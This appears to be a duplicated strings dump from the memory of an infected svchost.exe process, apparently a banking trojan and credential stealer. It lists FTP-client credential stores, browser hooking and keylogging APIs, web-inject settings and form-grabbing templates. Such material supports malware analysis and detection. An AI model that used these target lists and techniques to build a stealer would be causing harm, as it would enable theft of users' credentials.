DELETE FROM %s.sqlite_sequence WHERE name=%Q
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
table %s may not be dropped
table %s may not be dropped
UPDATE %Q.%s SET rootpage=%d WHERE #0 AND rootpage=#0
UPDATE %Q.%s SET rootpage=%d WHERE #0 AND rootpage=#0
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
table %s has no column named %s
table %s has no column named %s
sqlite_autoindex_
sqlite_autoindex_
index %s already exists
index %s already exists
there is already a table named %s
there is already a table named %s
virtual tables may not be indexed
virtual tables may not be indexed
views may not be indexed
views may not be indexed
table %s may not be indexed
table %s may not be indexed
indexed columns are not unique
indexed columns are not unique
DELETE FROM %Q.%s WHERE name=%Q
DELETE FROM %Q.%s WHERE name=%Q
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
no such index: %S
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such collation sequence: %s
no such collation sequence: %s
cannot modify %s because it is a view
cannot modify %s because it is a view
table %s may not be modified
table %s may not be modified
table %S has no column named %s
table %S has no column named %s
%d values for %d columns
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
PRIMARY KEY must be unique
PRIMARY KEY must be unique
error during initialization: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
unable to open shared library [%s]
sqlite3_extension_init
sqlite3_extension_init
automatic extension loading failed: %s
automatic extension loading failed: %s
unsupported encoding: %s
unsupported encoding: %s
*** in database %s ***
*** in database %s ***
foreign_key_list
foreign_key_list
SELECT name, rootpage, sql FROM '%q'.%s
SELECT name, rootpage, sql FROM '%q'.%s
unsupported file format
unsupported file format
database schema is locked: %s
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T%s%T%s%T
unknown or unsupported join type: %T%s%T%s%T
%z:%d
%z:%d
column%d
column%d
%s.%s
%s.%s
sqlite_subquery_%p_
sqlite_subquery_%p_
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
%s BY column number %d out of range - should be between 1 and %d
%s BY column number %d out of range - should be between 1 and %d
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
ORDER BY term number %d does not match any result column
ORDER BY term number %d does not match any result column
ORDER BY position %d should be between 1 and %d
ORDER BY position %d should be between 1 and %d
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
no such trigger: %S
no such trigger: %S
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#1
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#1
no such module: %s
no such module: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
vtable constructor failed: %s
vtable constructor failed: %s
%z VIRTUAL TABLE INDEX %d:%s
%z VIRTUAL TABLE INDEX %d:%s
%z USING PRIMARY KEY
%z USING PRIMARY KEY
%z WITH INDEX %s
%z WITH INDEX %s
%z AS %s
%z AS %s
TABLE %s
TABLE %s
B}Tat most %d tables in a join
B}Tat most %d tables in a join
incomplete SQL statement
incomplete SQL statement
kernel lacks large file support
kernel lacks large file support
SQL logic error or missing database
SQL logic error or missing database
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
SOFTWARE\Far2\SavedDialogHistory\FTPHost
SOFTWARE\Far2\SavedDialogHistory\FTPHost
SOFTWARE\Far2\Plugins\FTP\Hosts
SOFTWARE\Far2\Plugins\FTP\Hosts
\wcx_PTF.ini
\wcx_PTF.ini
Software\Ghisler\Windows Commander
Software\Ghisler\Windows Commander
CSMFTPItem
CSMFTPItem
\sm.dat
\sm.dat
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Home
\GlobalSCAPE\CuteFTP Home
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Lite
\Quick.dat
\Quick.dat
\Sites.dat
\Sites.dat
\FileZilla\sitemanager.xml
\FileZilla\sitemanager.xml
\FileZilla\recentservers.xml
\FileZilla\recentservers.xml
\ftplist.txt
\ftplist.txt
FTP Commander Pro
FTP Commander Pro
FTP Navigator
FTP Navigator
FTP Commander
FTP Commander
FTP Commander Deluxe
FTP Commander Deluxe
Software\BFTP
Software\BFTP
\BulletProof Software\BulletProof FTP Client 2009
\BulletProof Software\BulletProof FTP Client 2009
\BulletProof Software\BulletProof FTP Client
\BulletProof Software\BulletProof FTP Client
\SmartFTP\Client 2.0\Favorites
\SmartFTP\Client 2.0\Favorites
\SmartFTP
\SmartFTP
\TurboFTP
\TurboFTP
\addrbk.dat
\addrbk.dat
Software\TurboFTP
Software\TurboFTP
Software\Sota\FFFTP
Software\Sota\FFFTP
DefaultPassword
DefaultPassword
Software\Sota\FFFTP\Options
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
Software\FTPWare\COREFTP\Sites
\FTP Explorer\profiles.xml
\FTP Explorer\profiles.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UltraFXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UltraFXP
Software\Cryer\WebSitePublisher
Software\Cryer\WebSitePublisher
Software\NCH Software\ClassicFTP\FTPAccounts
Software\NCH Software\ClassicFTP\FTPAccounts
Software\SoftX.org\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Software\FTPClient\Sites
Software\FTPClient\Sites
\GPSoftware\Directory Opus\ConfigFiles\PTF.oxc
\GPSoftware\Directory Opus\ConfigFiles\PTF.oxc
Software\Dev Zero G\FTP Uploader\FTP Uploader
Software\Dev Zero G\FTP Uploader\FTP Uploader
Software\South River Technologies\WebDrive\Connections
Software\South River Technologies\WebDrive\Connections
klfhuw%$#%fgjlvf
klfhuw%$#%fgjlvf
\NetDrive\NDSites.ini
\NetDrive\NDSites.ini
zcÃ
zcÃ
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
PeekNamedPipe
PeekNamedPipe
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
RegCloseKey
RegCloseKey
.flat
.flat
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.asmdata
.asmdata
@.reloc
@.reloc
TPFk/dPipeG
TPFk/dPipeG
;-keXE
;-keXE
.ho"
.ho"
svchost.exe_1512_rwx_20121000_0005D000:
t#WSSh
t#WSSh
BrowserRealKeyStream
BrowserRealKeyStream
BrowserRealKeyPress
BrowserRealKeyPress
BrowserKeyPress
BrowserKeyPress
GetDocumentUrl
GetDocumentUrl
LoadUrl
LoadUrl
ikey
ikey
!=*/&| -
!=*/&| -
0123456789
0123456789
--%s--
--%s--
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Transfer-Encoding: %s
Content-Transfer-Encoding: %s
Content-Type: multipart/form-data, boundary=%s
Content-Type: multipart/form-data, boundary=%s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Range: bytes=%d-
Range: bytes=%d-
Range: bytes=%d-%d
Range: bytes=%d-%d
https
https
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
%s%s%s
%s%s%s
00000409
00000409
%CommonProgramFiles%
%CommonProgramFiles%
GetExeDirectory
GetExeDirectory
GetExeFullPath
GetExeFullPath
GetExeName
GetExeName
SetDownloadUrl
SetDownloadUrl
UrlEncode
UrlEncode
DeleteUrlCache
DeleteUrlCache
SetUrlCookie
SetUrlCookie
GetUrlCookie
GetUrlCookie
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
operator
operator
kernel32.dll
kernel32.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
.?AVCMyWebBrowser@@
.?AVCMyWebBrowser@@
.?AVCSdkWebBrowser@@
.?AVCSdkWebBrowser@@
IEScope%d
IEScope%d
iexplore%d
iexplore%d
zcÃ
zcÃ
%System%\svchost.exe
%System%\svchost.exe
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
PeekNamedPipe
PeekNamedPipe
ShellExecuteA
ShellExecuteA
UrlMkSetSessionOption
UrlMkSetSessionOption
UrlMkGetSessionOption
UrlMkGetSessionOption
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
LoadKeyboardLayoutA
LoadKeyboardLayoutA
VkKeyScanExA
VkKeyScanExA
keybd_event
keybd_event
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
HttpSendRequestA
HttpSendRequestA
HttpEndRequestA
HttpEndRequestA
GetUrlCacheEntryInfoA
GetUrlCacheEntryInfoA
InternetCrackUrlA
InternetCrackUrlA
FindCloseUrlCache
FindCloseUrlCache
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestExA
HttpSendRequestExA
xquuuuuRLMLMLMLMLMLM
xquuuuuRLMLMLMLMLMLM
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
svchost.exe_1512_rwx_20181000_00036000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
%Documents and Settings%\%current user%\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\%current user%\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\%current user%\Local Settings\Application Data\ahigjltn.log
%Documents and Settings%\%current user%\Local Settings\Application Data\ahigjltn.log
%Documents and Settings%\%current user%\Local Settings\Application Data\taywrdpm.log
%Documents and Settings%\%current user%\Local Settings\Application Data\taywrdpm.log
%Documents and Settings%\%current user%\Local Settings\Application Data\vssqectp.log
%Documents and Settings%\%current user%\Local Settings\Application Data\vssqectp.log
%Documents and Settings%\%current user%\Local Settings\Application Data\klsckhjr.log
%Documents and Settings%\%current user%\Local Settings\Application Data\klsckhjr.log
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_1512_rwx_201C1000_0003F000:
\$0#\$83
\$0#\$83
\$4#\$,3
\$4#\$,3
PSSh0G
PSSh0G
G%F;0r
G%F;0r
Single block msg
Single block msg
AES-CTR-128 (%s):
AES-CTR-128 (%s):
AES-CFB128-= (%s):
AES-CFB128-= (%s):
AES-CBC-= (%s):
AES-CBC-= (%s):
passed
passed
AES-ECB-= (%s):
AES-ECB-= (%s):
ARC4 test #%d:
ARC4 test #%d:
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
Unexpected error, return code = X
Unexpected error, return code = X
failed at %d
failed at %d
CAMELLIA-CTR-128 (%s):
CAMELLIA-CTR-128 (%s):
CAMELLIA-CBC-= (%s):
CAMELLIA-CBC-= (%s):
CAMELLIA-ECB-= (%s):
CAMELLIA-ECB-= (%s):
-----BEGIN CERTIFICATE-----
-----BEGIN CERTIFICATE-----
gZUwgZIwDAYDVR0TBAUwAwEB/zAdBgNVHQ4EFgQUtFrkpbPe0lL2udWmlQ/rPrzH
gZUwgZIwDAYDVR0TBAUwAwEB/zAdBgNVHQ4EFgQUtFrkpbPe0lL2udWmlQ/rPrzH
-----END CERTIFICATE-----
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
JczSfpRWLlbPznZg8OQh/VgCMA58N5DjOzTIK7sJJ5r 94ZBTCpgAMbF588f0NTR
JczSfpRWLlbPznZg8OQh/VgCMA58N5DjOzTIK7sJJ5r 94ZBTCpgAMbF588f0NTR
-----END RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w
lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w
pgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTrlZvc/kFeF6babFtpzAK6
pgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTrlZvc/kFeF6babFtpzAK6
%s(d): %s
%s(d): %s
%s(d): %s() returned %d (0x%x)
%s(d): %s() returned %d (0x%x)
%s(d): x:
%s(d): x:
%s(d): dumping '%s' (%d bytes)
%s(d): dumping '%s' (%d bytes)
%s(d):
%s(d):
%s(d): value of '%s' (%lu bits) is:
%s(d): value of '%s' (%lu bits) is:
crt->rsa.E
crt->rsa.E
crt->rsa.N
crt->rsa.N
%s(d): %s #%d:
%s(d): %s #%d:
DES%c-CBC-= (%s):
DES%c-CBC-= (%s):
DES%c-ECB-= (%s):
DES%c-ECB-= (%s):
HMAC-MD5 test #%d:
HMAC-MD5 test #%d:
MD5 test #%d:
MD5 test #%d:
RSA key validation:
RSA key validation:
HMAC-SHA-1 test #%d:
HMAC-SHA-1 test #%d:
SHA-1 test #%d:
SHA-1 test #%d:
HMAC-SHA-%d test #%d:
HMAC-SHA-%d test #%d:
SHA-%d test #%d:
SHA-%d test #%d:
p.il :
p.il :
client hello, server name extension: %s
client hello, server name extension: %s
client hello, compress alg.: %d
client hello, compress alg.: %d
client hello, compress len.: %d
client hello, compress len.: %d
client hello, add ciphersuite: -
client hello, add ciphersuite: -
client hello, got %d ciphersuites
client hello, got %d ciphersuites
client hello, session id len.: %d
client hello, session id len.: %d
client hello, max version: [%d:%d]
client hello, max version: [%d:%d]
server hello, compress alg.: %d
server hello, compress alg.: %d
server hello, chosen ciphersuite: %d
server hello, chosen ciphersuite: %d
%s session has been resumed
%s session has been resumed
ssl_derive_keys
ssl_derive_keys
server hello, session id len.: %d
server hello, session id len.: %d
server hello, chosen version: [%d:%d]
server hello, chosen version: [%d:%d]
bad server key exchange message
bad server key exchange message
=> parse server key exchange
=> parse server key exchange
got %s certificate request
got %s certificate request
bad certificate request message
bad certificate request message
=> parse certificate request
=> parse certificate request
=> write client key exchange
=> write client key exchange
got no private key
got no private key
=> write certificate verify
=> write certificate verify
invalid state %d
invalid state %d
client state: %d
client state: %d
client hello v3, max. version: [%d:%d]
client hello v3, max. version: [%d:%d]
client hello v3, handshake len.: %d
client hello v3, handshake len.: %d
client hello v3, handshake type: %d
client hello v3, handshake type: %d
client hello v3, protocol ver: [%d:%d]
client hello v3, protocol ver: [%d:%d]
client hello v3, message len.: %d
client hello v3, message len.: %d
client hello v3, message type: %d
client hello v3, message type: %d
ciph_len: %d, sess_len: %d, chal_len: %d
ciph_len: %d, sess_len: %d, chal_len: %d
client hello v2, max. version: [%d:%d]
client hello v2, max. version: [%d:%d]
client hello v2, message len.: %d
client hello v2, message len.: %d
client hello v2, message type: %d
client hello v2, message type: %d
=> write certificate request
=> write certificate request
=> write server key exchange
=> write server key exchange
bad client key exchange message
bad client key exchange message
=> parse client key exchange
=> parse client key exchange
bad certificate verify message
bad certificate verify message
=> parse certificate verify
=> parse certificate verify
server state: %d
server state: %d
before encrypt: msglen = %d, including %d bytes of IV and %d bytes of padding
before encrypt: msglen = %d, including %d bytes of IV and %d bytes of padding
before encrypt: msglen = %d, including %d bytes of padding
before encrypt: msglen = %d, including %d bytes of padding
bad padding byte: should be x, but is x
bad padding byte: should be x, but is x
bad padding length: is %d, should be no more than %d
bad padding length: is %d, should be no more than %d
msglen (%d) %% ivlen (%d) != 0
msglen (%d) %% ivlen (%d) != 0
in_msglen (%d)
in_msglen (%d)
in_left: %d, nb_want: %d
in_left: %d, nb_want: %d
message length: %d, out_left: %d
message length: %d, out_left: %d
output record: msgtype = %d, version = [%d:%d], msglen = %d
output record: msgtype = %d, version = [%d:%d], msglen = %d
got an alert message, type: [%d:%d]
got an alert message, type: [%d:%d]
input record: msgtype = %d, version = [%d:%d], msglen = %d
input record: msgtype = %d, version = [%d:%d], msglen = %d
handshake message: msglen = %d, type = %d, hslen = %d
handshake message: msglen = %d, type = %d, hslen = %d
certificate too large, %d > %d
certificate too large, %d > %d
own certificate
own certificate
got no certificate to send
got no certificate to send
=> write certificate
=> write certificate
x509_verify_cert
x509_verify_cert
x509parse_crt
x509parse_crt
peer certificate
peer certificate
malloc(%d bytes) failed
malloc(%d bytes) failed
bad certificate message
bad certificate message
TLSv1 client has no certificate
TLSv1 client has no certificate
SSLv3 client has no certificate
SSLv3 client has no certificate
=> parse certificate
=> parse certificate
keylen: %d, minlen: %d, ivlen: %d, maclen: %d
keylen: %d, minlen: %d, ivlen: %d, maclen: %d
ciphersuite %s is not available
ciphersuite %s is not available
key block
key block
ciphersuite = %s
ciphersuite = %s
key expansion
key expansion
=> derive keys
=> derive keys
1.0.0
1.0.0
PolarSSL 1.0.0
PolarSSL 1.0.0
M-----
M-----
------
------
-----BEGIN PRIVATE KEY-----
-----BEGIN PRIVATE KEY-----
-----END PRIVATE KEY-----
-----END PRIVATE KEY-----
-----BEGIN PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
-----END PUBLIC KEY-----
0xX=
0xX=
X%s
X%s
%sRSA key size : %d bits
%sRSA key size : %d bits
%ssigned using : RSA
%ssigned using : RSA
%sexpires on : d-d-d d:d:d
%sexpires on : d-d-d d:d:d
%sissued on : d-d-d d:d:d
%sissued on : d-d-d d:d:d
%ssubject name :
%ssubject name :
%sissuer name :
%sissuer name :
%sserial number :
%sserial number :
%scert. version : %d
%scert. version : %d
TLS Web Client Authentication
TLS Web Client Authentication
TLS Web Server Authentication
TLS Web Server Authentication
%d.%d
%d.%d
revocation date: d-d-d d:d:d
revocation date: d-d-d d:d:d
%sserial number:
%sserial number:
%sRevoked certificates:
%sRevoked certificates:
%snext update : d-d-d d:d:d
%snext update : d-d-d d:d:d
%sthis update : d-d-d d:d:d
%sthis update : d-d-d d:d:d
%sCRL version : %d
%sCRL version : %d
X.509 private key load:
X.509 private key load:
X.509 certificate load:
X.509 certificate load:
XTEA test #%d:
XTEA test #%d:
Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX
System32\Macromed\Flash\mms.cfg
System32\Macromed\Flash\mms.cfg
%SystemRoot%\
%SystemRoot%\
/get/flashplayer/current/licensing/win/install_flash_player_11_active_x_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_active_x_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe
fpdownload.macromedia.com
fpdownload.macromedia.com
\install_flash_player_11_plugin_32bit.exe
\install_flash_player_11_plugin_32bit.exe
\install_flash_player_11_active_x_32bit.exe
